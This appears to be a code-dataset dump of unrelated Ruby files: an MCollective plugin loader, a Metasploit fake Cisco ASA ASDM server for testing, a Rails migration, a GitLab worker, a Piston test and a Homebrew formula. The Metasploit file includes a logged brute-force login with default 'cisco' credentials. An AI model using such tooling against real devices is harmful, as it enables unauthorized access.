    eval("#{klass}.new") # rubocop:disable Security/Eval, Style/EvalWithLocation
  rescue Exception => e # rubocop:disable Lint/RescueException
    raise("Could not create instance of plugin #{klass}: #{e}")
  end

  # Finds plugins in all configured libdirs
  #
  #    find("agent")
  #
  # will return an array of just agent names, for example:
  #
  #    ["puppetd", "package"]
  #
  # Can also be used to find files of other extensions:
  #
  #    find("agent", "ddl")
  #
  # Will return the same list but only of files with extension .ddl
  # in the agent subdirectory
  def self.find(type, extension="rb")
    extension = ".#{extension}" unless extension =~ /^\./

    plugins = []

    Config.instance.libdir.each do |libdir|
      plugdir = File.join([libdir, "mcollective", type.to_s])
      next unless File.directory?(plugdir)

      Dir.new(plugdir).grep(/#{extension}$/).map do |plugin|
        plugins << File.basename(plugin, extension)
      end
    end

    # Same plugin name may exist in several libdirs; dedupe.
    plugins.sort.uniq
  end

  # Finds and loads from disk all plugins from all libdirs that match
  # certain criteria.
  #
  #    find_and_load("pluginpackager")
  #
  # Will find all .rb files in the libdir/mcollective/pluginpackager/
  # directory in all libdirs and load them from disk.
  #
  # You can influence what plugins get loaded using a block notation:
  #
  #    find_and_load("pluginpackager") do |plugin|
  #      plugin.match(/puppet/)
  #    end
  #
  # This will load only plugins matching /puppet/
  def self.find_and_load(type, extension="rb")
    extension = ".#{extension}" unless extension =~ /^\./

    klasses = find(type, extension).map do |plugin|
      next if block_given? && !yield(plugin)

      "%s::%s::%s" % ["MCollective", type.capitalize, plugin.capitalize]
    end.compact

    klasses.sort.uniq.each {|klass| loadclass(klass, true)}
  end

  # Loads a class from file by doing some simple search/replace
  # on class names and then doing a require.
  # NOTE(review): uses Kernel#load, so calling this twice re-executes the
  # file — presumably intentional for plugin reloads; confirm.
  def self.loadclass(klass, squash_failures=false)
    fname = "#{klass.gsub('::', '/').downcase}.rb"

    Log.debug("Loading #{klass} from #{fname}")

    load fname
  rescue Exception => e # rubocop:disable Lint/RescueException
    Log.error("Failed to load #{klass}: #{e}")
    raise unless squash_failures
  end

  # Greps over the plugin type names and returns the matches
  def self.grep(regex)
    @plugins.keys.grep(regex)
  end
end
end
| 33.801136 | 108 | 0.635569 |
18f2648bd60f36fb31b702d75ebb7ab67569d165 | 4,248 | ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpServer

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Basic HttpServer Simulator',
      'Description'    => %q{
          This is example of a basic HttpServer simulator, good for PR scenarios when a module
        is made, but the author no longer has access to the test box, no pcap or screenshot -
        Basically no way to prove the functionality.
          This particular simulator will pretend to act like a Cisco ASA ASDM, so the
        cisco_asa_asdm.rb module can do a live test against it.
      },
      'References'     =>
        [
          [ 'URL', 'https://github.com/rapid7/metasploit-framework/pull/2720' ],
        ],
      'DefaultOptions' =>
        {
          'SRVPORT' => 443,
          'SSL'     => true,
          'URIPATH' => '/'
        },
      'Author'         => [ 'sinn3r' ],
      'License'        => MSF_LICENSE
    ))

    register_options(
      [
        OptString.new('USERNAME', [true, "The valid default username", "cisco"]),
        OptString.new('PASSWORD', [true, "The valid default password", "cisco"])
      ], self.class)

    deregister_options('RHOST')
  end

  #
  # Returns an empty response when the client is checking the connection.
  #
  def res_check_conn(cli, req)
    send_response(cli, '')
  end

  #
  # Returns a response when the client is trying to authenticate.
  # GET  -> answers the is_app_asdm? probe with the webvpn cookie.
  # POST -> validates the posted username/password against the datastore.
  #
  def res_login(cli, req)
    case req.method
    when 'GET'
      # This must be the is_app_asdm? method asking
      print_status("Responding to the is_app_asdm? method")
      send_response(cli, '', {'Set-Cookie'=>'webvpn'})
    when 'POST'
      # This must be the do_login method. But before it can login, it must meet
      # the cookie requirement.
      # FIX: the original compared the header String to a Regexp with ==,
      # which is always false, so the redirect branch could never fire.
      if req.headers['Cookie'] =~ /webvpnlogin=1; tg=0DefaultADMINGroup/
        send_redirect(cli)
        return
      end

      # Process the post data into key/value pairs
      vars_post = {}
      req.body.scan(/(\w+=\w+)/).flatten.each do |param|
        k, v = param.split('=')
        vars_post[k] = v
      end

      # Auth against the configured USERNAME/PASSWORD options
      if vars_post['username'] == datastore['USERNAME'] && vars_post['password'] == datastore['PASSWORD']
        print_good("Authenticated")
        fake_success_body = %Q|
        SSL VPN Service
        Success
        success
        |
        send_response(cli, fake_success_body)
      else
        print_error("Bad login")
        resp = create_response(403, "Access Denied")
        resp.body = ''
        cli.send_response(resp)
      end
    end
  end

  def on_request_uri(cli, req)
    print_status("Received request: #{req.uri}")

    case req.uri
    when '/'
      res_check_conn(cli, req)
    when /\+webvpn\+\/index\.html/
      res_login(cli, req)
    else
      # FIX: only unhandled URIs get a 404. Previously this ran after every
      # request, sending a second response on already-handled connections.
      send_not_found(cli)
    end
  end

  def run
    exploit
  end
end
=begin
Test Results - client output:
msf auxiliary(cisco_asa_asdm) > run
[+] 10.0.1.76:443 - Server is responsive...
[*] 10.0.1.76:443 - Application appears to be Cisco ASA ASDM. Module will continue.
[*] 10.0.1.76:443 - Starting login brute force...
[*] 10.0.1.76:443 - [1/2] - Trying username:"cisco" with password:""
[-] 10.0.1.76:443 - [1/2] - FAILED LOGIN - "cisco":""
[*] 10.0.1.76:443 - [2/2] - Trying username:"cisco" with password:"cisco"
[+] 10.0.1.76:443 - SUCCESSFUL LOGIN - "cisco":"cisco"
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(cisco_asa_asdm) >
Test Results - Fake server output:
msf auxiliary(httpserver) > run
[*] Using URL: https://0.0.0.0:443/
[*] Local IP: https://10.0.1.76:443/
[*] Server started.
[*] 10.0.1.76 httpserver - Received request: /
[*] 10.0.1.76 httpserver - Received request: /+webvpn+/index.html
[*] 10.0.1.76 httpserver - Responding to the is_app_asdm? method
[*] 10.0.1.76 httpserver - Received request: /+webvpn+/index.html
[-] 10.0.1.76 httpserver - Bad login
[*] 10.0.1.76 httpserver - Received request: /+webvpn+/index.html
[+] Authenticated
=end
| 27.764706 | 106 | 0.610169 |
012e7c2233d07c575747ca64d3e619f9d4dc8e3c | 38 | # stub
require 'facets/string/upcase'
| 12.666667 | 30 | 0.763158 |
bf53ef50ff0d5280e7067e72c87ae15d96ed4619 | 223 | class CreateUsers < ActiveRecord::Migration[5.1]
# Creates the users table.
# FIX: the original contained a bare `t.integer` with no column name,
# which is a no-op in ActiveRecord's TableDefinition — removed as dead
# code. Restore it with a column name if a column was actually intended.
def change
  create_table :users do |t|
    t.string :name
    t.integer :age
    t.string :astrological_sign

    t.timestamps
  end
end
end
| 17.153846 | 48 | 0.636771 |
ed2e00f1241b820eff82b9527a1d807c0dd4f825 | 571 | # frozen_string_literal: true
# Destroys one user account on behalf of another user via
# Users::DestroyService.
class DeleteUserWorker # rubocop:disable Scalability/IdempotentWorker
  include ApplicationWorker

  feature_category :authentication_and_authorization
  loggable_arguments 2

  # @param current_user_id [Integer] id of the user requesting the deletion
  # @param delete_user_id [Integer] id of the account to destroy
  # @param options [Hash] forwarded to Users::DestroyService#execute
  def perform(current_user_id, delete_user_id, options = {})
    # Lookup order preserved: the target is resolved before the actor.
    target = User.find(delete_user_id)
    actor = User.find(current_user_id)

    Users::DestroyService.new(actor).execute(target, options.symbolize_keys)
  rescue Gitlab::Access::AccessDeniedError => e
    # Denied deletions are an expected outcome; log instead of failing the job.
    Gitlab::AppLogger.warn("User could not be destroyed: #{e}")
  end
end
| 31.722222 | 88 | 0.788091 |
f8e2958b3d0042272e02862fc0a277ca394274f2 | 1,954 | require File.dirname(__FILE__) + "/../../../test_helper"
# Unit tests for Piston::Svn::WorkingCopy's svn:externals parsing and
# removal. The `svn` command is stubbed/mocked (mocha-style) so no real
# Subversion calls happen.
class TestWorkingCopyExternals < Test::Unit::TestCase
  def setup
    @wcdir = Pathname.new("tmp/wc")
    @wc = Piston::Svn::WorkingCopy.new(@wcdir)
  end

  # No externals property -> empty hash.
  def test_parse_empty_svn_externals
    @wc.stubs(:svn).returns(EMPTY_EXTERNALS)
    assert_equal({}, @wc.externals)
  end

  # An external with no pinned revision parses as :head.
  def test_parse_simple_externals
    @wc.stubs(:svn).returns(SIMPLE_RAILS_EXTERNALS)
    assert_equal({@wcdir + "vendor/rails" => {:revision => :head, :url => "http://dev.rubyonrails.org/svn/rails/trunk"}}, @wc.externals)
  end

  # Short-form revision flag (-rNNNN) parses as an Integer revision.
  def test_parse_externals_with_revision
    @wc.stubs(:svn).returns(VERSIONED_RAILS_EXTERNALS)
    assert_equal({@wcdir + "vendor/rails" => {:revision => 8726, :url => "http://dev.rubyonrails.org/svn/rails/trunk"}}, @wc.externals)
  end

  # Long-form revision flag (--revision NNNN) parses the same way.
  def test_parse_externals_with_long_revision
    @wc.stubs(:svn).returns(LONG_VERSION_RAILS_EXTERNALS)
    assert_equal({@wcdir + "vendor/rails" => {:revision => 8726, :url => "http://dev.rubyonrails.org/svn/rails/trunk"}}, @wc.externals)
  end

  # Removal must issue `svn propdel svn:externals <dir>`.
  def test_remove_external_references_calls_svn_propdel
    @wc.expects(:svn).with(:propdel, "svn:externals", @wcdir+"vendor")
    @wc.remove_external_references(@wcdir+"vendor")
  end

  # Multiple directories are passed through in a single propdel call.
  def test_remove_external_references_calls_svn_propdel_with_multiple_dirs
    @wc.expects(:svn).with(:propdel, "svn:externals", @wcdir+"vendor", @wcdir+"vendor/plugins")
    @wc.remove_external_references(@wcdir+"vendor", @wcdir+"vendor/plugins")
  end

  # Canned `svn propget` outputs used as fixtures above.
  # NOTE(review): heredoc bodies are part of the parsed fixture text;
  # their exact whitespace may matter to the parser — do not reformat.
  EMPTY_EXTERNALS = ""

  SIMPLE_RAILS_EXTERNALS = <<EOF
Properties on 'vendor':
svn:externals : rails http://dev.rubyonrails.org/svn/rails/trunk
EOF

  VERSIONED_RAILS_EXTERNALS = <<EOF
Properties on 'vendor':
svn:externals : rails -r8726 http://dev.rubyonrails.org/svn/rails/trunk
EOF

  LONG_VERSION_RAILS_EXTERNALS = <<EOF
Properties on 'vendor':
svn:externals : rails --revision 8726 http://dev.rubyonrails.org/svn/rails/trunk
EOF
end
| 34.892857 | 136 | 0.723132 |
03a8d8c0ee26b07b1012ec24008d153a0e7c85da | 1,674 | class Aravis < Formula
desc "Vision library for genicam based cameras"
homepage "https://wiki.gnome.org/Projects/Aravis"
url "https://download.gnome.org/sources/aravis/0.8/aravis-0.8.6.tar.xz"
sha256 "f2460c8e44ba2e6e76f484568f7b93932040c1280131ecd715aafcba77cffdde"
license "LGPL-2.1-or-later"

bottle do
  sha256 arm64_big_sur: "03957fe3eab53520827a52a153f527615cdbf07406636279891189f8b037c6fa"
  sha256 big_sur:       "13b501800640ac63a447119d9f82f1dabf26feeabfd119d8e559536bdb6723ec"
  sha256 catalina:      "21518b405685f7cf230f084570bc92b9fbf7ea116bbabd02041b4f265d2e762c"
  sha256 mojave:        "da90fdc84b7291acab730e63443b23c007f9f328a4a0f172bce50c054b3d76f8"
end

depends_on "gobject-introspection" => :build
depends_on "gtk-doc" => :build
depends_on "meson" => :build
depends_on "ninja" => :build
depends_on "pkg-config" => :build
depends_on "adwaita-icon-theme"
depends_on "glib"
depends_on "gst-plugins-bad"
depends_on "gst-plugins-base"
depends_on "gst-plugins-good"
depends_on "gstreamer"
depends_on "gtk+3"
depends_on "intltool"
depends_on "libnotify"
depends_on "libusb"

def install
  # Point gtk-doc at Homebrew's XML catalog so the docs build can resolve DTDs.
  ENV["XML_CATALOG_FILES"] = "#{etc}/xml/catalog"
  mkdir "build" do
    system "meson", *std_meson_args, ".."
    system "ninja"
    system "ninja", "install"
  end
end

def post_install
  # Refresh the shared icon cache so the installed icons are picked up.
  system "#{Formula["gtk+3"].opt_bin}/gtk3-update-icon-cache", "-f", "-t", "#{HOMEBREW_PREFIX}/share/icons/hicolor"
end

test do
  output = shell_output("gst-inspect-1.0 #{lib}/gstreamer-1.0/libgstaravis.#{version.major_minor}.dylib")
  # FIX: parenthesized assert_match — a bare regexp first argument triggers
  # Ruby's "ambiguous first argument" warning.
  assert_match(/Description *Aravis Video Source/, output)
end
end
| 33.48 | 117 | 0.733572 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.